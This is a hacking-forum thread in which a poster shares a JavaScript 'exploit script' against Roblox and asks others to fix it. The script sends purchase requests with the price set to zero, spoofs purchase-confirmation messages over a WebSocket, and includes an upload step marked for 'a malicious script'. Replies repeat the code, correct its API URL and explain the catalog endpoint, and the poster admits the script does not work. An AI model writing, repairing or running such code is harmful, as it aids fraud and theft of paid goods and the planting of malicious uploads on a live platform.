Posts: 8
Threads: 1
Joined: Jul 2024
07-12-2024, 03:36 AM
(This post was last modified: 07-12-2024, 03:38 AM by wasteful_disgrace.)
Ive been working on a roblox exploit script that uses API Vuln to get stuff for free but i can't get it to work. Maybe you guys can fix it or make it more davance then me.
If you have anything to say about this script please do so, and if you got it to work congrats.
function pillageRoblox() {
// Get the item ID from the input field
const itemId = document.getElementById('itemId').value;
// Fetch item details from the Roblox Catalog API
fetch(https://catalog.roblox.com/v1/catalog/it...6;{itemId})
.then(response => response.json())
.then(data => {
// Extract item details (e.g., name, price)
const itemDetails = data.data[0];
const itemName = itemDetails.name;
const itemPrice = itemDetails.price;
console.log(Targeting ${itemName} (Price: ${itemPrice}));
// Prepare the payload with modified price
const payload = {
productId: itemId, // Include the product ID
attempt_robux_amount: 0, // Set to 0 for free acquisition
upsell_platform: "WEB",
user_robux_balance: 0
};
// *** WebSocket Shenanigans ***
const socket = new WebSocket('wss://realtime-signalr.roblox.com/userhub');
let purchaseAttemptDetected = false; // Flag to track purchase attempts
socket.onopen = () => {
console.log('WebSocket connection opened');
};
socket.onmessage = (event) => {
console.log("WebSocket message:", event.data);
// Analyze WebSocket data and extract relevant information
const message = JSON.parse(event.data);
// ... Look for patterns that indicate purchase attempts or vulnerabilities
// ... Potentially send spoofed messages to manipulate the system
// Example: Detect purchase attempts
if (message.hasOwnProperty('purchaseAttempt') && message.purchaseAttempt === true) {
purchaseAttemptDetected = true;
console.log('Purchase attempt detected!');
}
// Example: Send spoofed messages (if purchase attempt detected)
if (purchaseAttemptDetected && message.hasOwnProperty('confirmationRequired')) {
const spoofedMessage = {
confirmationRequired: false,
purchaseId: message.purchaseId,
confirmationAction: 'CONFIRM'
};
socket.send(JSON.stringify(spoofedMessage));
}
};
socket.onerror = (error) => {
console.error("WebSocket error:", error);
};
socket.onclose = (event) => {
console.log("WebSocket connection closed");
};
// *** Economy Exploitation ***
// Send a purchase request to get the seller ID
fetch(https://economy.roblox.com/v1/purchases/products/${itemId}, {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(payload)
})
.then(response => response.json())
.then(data => {
console.log("Economy API response:", data);
const sellerId = data.expectedSellerId; // Extract the seller ID
// Craft the spoofed message
const spoofedMessage = {
"productId": itemId,
"expectedCurrency": 1,
"expectedPrice": 0,
"expectedSellerId": sellerId,
"purchased": true,
"reason": "Success"
};
// Send the spoofed message
fetch(https://economy.roblox.com/v1/purchases/products/${itemId}, {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(spoofedMessage)
})
.then(response => response.json())
.then(data => {
console.log("Spoofed purchase response:", data);
// Check for success or failure based on the response
// ... Example:
if (data.status === 'SUCCESS') {
alert("✅ Your item was successfully purchased!"); // Alert the user
} else {
alert("❌ Purchase failed! Try again later."); // Alert the user
}
})
.catch(error => console.error("Error making spoofed purchase:", error));
})
.catch(error => console.error("Error with Economy API:", error));
// *** Upload Infiltration ***
// Prepare file upload data
const fileData = new FormData();
// ... Add file data or a malicious script to upload
// ...
fetch('https://ncs.roblox.com/upload', {
method: 'POST',
body: fileData
})
.then(response => response.json())
.then(data => {
console.log("Upload API response:", data);
// Analyze the response and check if the upload was successful
// ...
})
.catch(error => console.error("Error with Upload API:", error));
})
.catch(error => console.error("Error fetching item details:", error));
}
ITS a java Script By the way
Posts: 8
Threads: 1
Joined: Jul 2024
(07-12-2024, 03:26 PM)funniguy Wrote: is this serversided?
It could possible be, I just hope there is someone who knows how to fix it.
Posts: 8
Threads: 1
Joined: Jul 2024
(07-12-2024, 04:16 PM)voidgod15 Wrote: i don't know javascript but when i took a look at the code and try to run it it give me a error I think I fixed the error but idk what is the URL https://catalog.roblox.com/v1/catalog/it...6;{itemId}
if you can explain I can try and fix it
function pillageRoblox() {
// Get the item ID from the input field
const itemId = document.getElementById('itemId').value;
// Fetch item details from the Roblox Catalog API
fetch("https://catalog.roblox.com/v1/catalog/it...ails?items=${itemId}")
.then(response => response.json())
.then(data => {
// Extract item details (e.g., name, price)
const itemDetails = data.data[0];
const itemName = itemDetails.name;
const itemPrice = itemDetails.price;
console.log("{itemName}".Target);
console.log("{itemPrice}".Price);
// Prepare the payload with modified price
const payload = {
productId: itemId, // Include the product ID
attempt_robux_amount: 0, // Set to 0 for free acquisition
upsell_platform: "WEB",
user_robux_balance: 0
};
// *** WebSocket Shenanigans ***
const socket = new WebSocket('wss://realtime-signalr.roblox.com/userhub');
let purchaseAttemptDetected = false; // Flag to track purchase attempts
socket.onopen = () => {
console.log('WebSocket connection opened');
};
socket.onmessage = (event) => {
console.log("WebSocket message:", event.data);
// Analyze WebSocket data and extract relevant information
const message = JSON.parse(event.data);
// ... Look for patterns that indicate purchase attempts or vulnerabilities
// ... Potentially send spoofed messages to manipulate the system
// Example: Detect purchase attempts
if (message.hasOwnProperty('purchaseAttempt') && message.purchaseAttempt === true) {
purchaseAttemptDetected = true;
console.log('Purchase attempt detected!');
}
// Example: Send spoofed messages (if purchase attempt detected)
if (purchaseAttemptDetected && message.hasOwnProperty('confirmationRequired')) {
const spoofedMessage = {
confirmationRequired: false,
purchaseId: message.purchaseId,
confirmationAction: 'CONFIRM'
};
socket.send(JSON.stringify(spoofedMessage));
}
};
socket.onerror = (error) => {
console.error("WebSocket error:", error);
};
socket.onclose = (event) => {
console.log("WebSocket connection closed");
};
// *** Economy Exploitation ***
// Send a purchase request to get the seller ID
fetch("https://economy.roblox.com/v1/purchases/products/${itemId}", {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(payload)
})
.then(response => response.json())
.then(data => {
console.log("Economy API response:", data);
const sellerId = data.expectedSellerId; // Extract the seller ID
// Craft the spoofed message
const spoofedMessage = {
"productId": itemId,
"expectedCurrency": 1,
"expectedPrice": 0,
"expectedSellerId": sellerId,
"purchased": true,
"reason": "Success"
};
// Send the spoofed message
fetch("https://economy.roblox.com/v1/purchases/products/${itemId}", {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(spoofedMessage)
})
.then(response => response.json())
.then(data => {
console.log("Spoofed purchase response:", data);
// Check for success or failure based on the response
// ... Example:
if (data.status === 'SUCCESS') {
alert("✅ Your item was successfully purchased!"); // Alert the user
} else {
alert("❌ Purchase failed! Try again later."); // Alert the user
}
})
.catch(error => console.error("Error making spoofed purchase:", error));
})
.catch(error => console.error("Error with Economy API:", error));
// *** Upload Infiltration ***
// Prepare file upload data
const fileData = new FormData();
// ... Add file data or a malicious script to upload
// ...
fetch('https://ncs.roblox.com/upload', {
method: 'POST',
body: fileData
})
.then(response => response.json())
.then(data => {
console.log("Upload API response:", data);
// Analyze the response and check if the upload was successful
// ...
})
.catch(error => console.error("Error with Upload API:", error));
})
.catch(error => console.error("Error fetching item details:", error));
}
can you add me on discord v0idg0d1
the URL for the Roblox Catalog API endpoint Ive been using is to fetch information about specific items.
Let's break it down:- https://catalog.roblox.com/v1/catalog/items/details: The is the base URL for the Catalog API's "details" endpoint.
- ?items=${itemId}: This is a query parameter that tells the API which item we want to retrieve. The itemId is the unique ID of the Roblox item you're interested in.
Here's how it works:
- You provide the itemId to the script.
- The script constructs the complete URL by replacing ${itemId} with the actual item ID.
- The script sends a request to the API using the fetch method.
- The API returns a JSON response containing details about the item.
What information does this API return?
This API endpoint provides a wealth of information about the item, including:- name: The name of the item.
- description: A description of the item.
- price: The price of the item in Robux.
- creator: The name of the person who created the item.
- assetId: The unique asset ID of the item.
- assetType: The type of asset (e.g., "Hair Accessory", "Shirt", "Place").
- assetIsWearable: Whether the item can be worn by an avatar.
- isForSale: Whether the item is currently available for purchase.
- isLimited: Whether the item is a limited-edition item.
- isLimitedUnique: Whether the item is a unique limited-edition item.
- ... and more!
Why do we use this API?
We need this API to:- Get the item ID: To craft the correct purchase request.
- Get the item name: To display to the user which item they're trying to acquire.
- Get the item price: To confirm that we're targeting the correct item and for any other necessary manipulation.
- Get other relevant details: The API provides valuable information that might be useful for crafting exploits.
Posts: 25
Threads: 2
Joined: Feb 2024
The Roblox API is server-side based. But there was a time when some things were clint-side like: name, id, account creation date etc. You could make your name ROBLOX and troll kids and it was pretty funny, then when it got out of hand, they made everything server-side.
Posts: 8
Threads: 1
Joined: Jul 2024
funniguy dateline='[url=tel:1720803078' Wrote: 1720803078[/url]']
wasteful_disgrace dateline='[url=tel:1720802859' Wrote: 1720802859[/url]']
voidgod15 dateline='[url=tel:1720801017' Wrote: 1720801017[/url]']
i don't know javascript but when i took a look at the code and try to run it it give me a error I think I fixed the error but idk what is the URL https://catalog.roblox.com/v1/catalog/it...6;{itemId}
if you can explain I can try and fix it
function pillageRoblox() {
// Get the item ID from the input field
const itemId = document.getElementById('itemId').value;
// Fetch item details from the Roblox Catalog API
fetch("https://catalog.roblox.com/v1/catalog/it...ails?items=${itemId}")
.then(response => response.json())
.then(data => {
// Extract item details (e.g., name, price)
const itemDetails = data.data[0];
const itemName = itemDetails.name;
const itemPrice = itemDetails.price;
console.log("{itemName}".Target);
console.log("{itemPrice}".Price);
// Prepare the payload with modified price
const payload = {
productId: itemId, // Include the product ID
attempt_robux_amount: 0, // Set to 0 for free acquisition
upsell_platform: "WEB",
user_robux_balance: 0
};
// *** WebSocket Shenanigans ***
const socket = new WebSocket('wss://realtime-signalr.roblox.com/userhub');
let purchaseAttemptDetected = false; // Flag to track purchase attempts
socket.onopen = () => {
console.log('WebSocket connection opened');
};
socket.onmessage = (event) => {
console.log("WebSocket message:", event.data);
// Analyze WebSocket data and extract relevant information
const message = JSON.parse(event.data);
// ... Look for patterns that indicate purchase attempts or vulnerabilities
// ... Potentially send spoofed messages to manipulate the system
// Example: Detect purchase attempts
if (message.hasOwnProperty('purchaseAttempt') && message.purchaseAttempt === true) {
purchaseAttemptDetected = true;
console.log('Purchase attempt detected!');
}
// Example: Send spoofed messages (if purchase attempt detected)
if (purchaseAttemptDetected && message.hasOwnProperty('confirmationRequired')) {
const spoofedMessage = {
confirmationRequired: false,
purchaseId: message.purchaseId,
confirmationAction: 'CONFIRM'
};
socket.send(JSON.stringify(spoofedMessage));
}
};
socket.onerror = (error) => {
console.error("WebSocket error:", error);
};
socket.onclose = (event) => {
console.log("WebSocket connection closed");
};
// *** Economy Exploitation ***
// Send a purchase request to get the seller ID
fetch("https://economy.roblox.com/v1/purchases/products/${itemId}", {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(payload)
})
.then(response => response.json())
.then(data => {
console.log("Economy API response:", data);
const sellerId = data.expectedSellerId; // Extract the seller ID
// Craft the spoofed message
const spoofedMessage = {
"productId": itemId,
"expectedCurrency": 1,
"expectedPrice": 0,
"expectedSellerId": sellerId,
"purchased": true,
"reason": "Success"
};
// Send the spoofed message
fetch("https://economy.roblox.com/v1/purchases/products/${itemId}", {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(spoofedMessage)
})
.then(response => response.json())
.then(data => {
console.log("Spoofed purchase response:", data);
// Check for success or failure based on the response
// ... Example:
if (data.status === 'SUCCESS') {
alert("✅ Your item was successfully purchased!"); // Alert the user
} else {
alert("❌ Purchase failed! Try again later."); // Alert the user
}
})
.catch(error => console.error("Error making spoofed purchase:", error));
})
.catch(error => console.error("Error with Economy API:", error));
// *** Upload Infiltration ***
// Prepare file upload data
const fileData = new FormData();
// ... Add file data or a malicious script to upload
// ...
fetch('https://ncs.roblox.com/upload', {
method: 'POST',
body: fileData
})
.then(response => response.json())
.then(data => {
console.log("Upload API response:", data);
// Analyze the response and check if the upload was successful
// ...
})
.catch(error => console.error("Error with Upload API:", error));
})
.catch(error => console.error("Error fetching item details:", error));
}
can you add me on discord v0idg0d1
the URL for the Roblox Catalog API endpoint Ive been using is to fetch information about specific items.
Let's break it down:- https://catalog.roblox.com/v1/catalog/items/details: The is the base URL for the Catalog API's "details" endpoint.
- ?items=${itemId}: This is a query parameter that tells the API which item we want to retrieve. The itemId is the unique ID of the Roblox item you're interested in.
Here's how it works:
- You provide the itemId to the script.
- The script constructs the complete URL by replacing ${itemId} with the actual item ID.
- The script sends a request to the API using the fetch method.
- The API returns a JSON response containing details about the item.
What information does this API return?
This API endpoint provides a wealth of information about the item, including:- name: The name of the item.
- description: A description of the item.
- price: The price of the item in Robux.
- creator: The name of the person who created the item.
- assetId: The unique asset ID of the item.
- assetType: The type of asset (e.g., "Hair Accessory", "Shirt", "Place").
- assetIsWearable: Whether the item can be worn by an avatar.
- isForSale: Whether the item is currently available for purchase.
- isLimited: Whether the item is a limited-edition item.
- isLimitedUnique: Whether the item is a unique limited-edition item.
- ... and more!
Why do we use this API?
We need this API to:- Get the item ID: To craft the correct purchase request.
- Get the item name: To display to the user which item they're trying to acquire.
- Get the item price: To confirm that we're targeting the correct item and for any other necessary manipulation.
- Get other relevant details: The API provides valuable information that might be useful for crafting exploits.
its probably because of " https://catalog.roblox.com/v1/catalog/it...6;{itemId}" and i think it should be "https://catalog.roblox.com/v1/catalog/itemdetails?items=${itemId}"
Yeah you’re right I’ve been stuck trying remember what I edited out. Thanks for reminding me
Posts: 27
Threads: 1
Joined: Sep 2024
thanks for this information very helpful
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Leeching.
Posts: 477
Threads: 13
Joined: Aug 2024
this was not working for me, but will try it again later today at some point.
Posts: 38
Threads: 0
Joined: Aug 2024
Posts: 6
Threads: 0
Joined: Oct 2024
Posts: 10,405
Threads: 226
Joined: Jun 2023
![[Image: Grant-from-Eastenders.jpg]](https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fi2-prod.mirror.co.uk%2Fincoming%2Farticle6588580.ece%2FALTERNATES%2Fs1200c%2FGrant-from-Eastenders.jpg)
The only item grant I cared about 
"Universal appeal is poison masquerading as medicine. Horror is not meant to be universal. It's meant to be personal, private, animal"
|
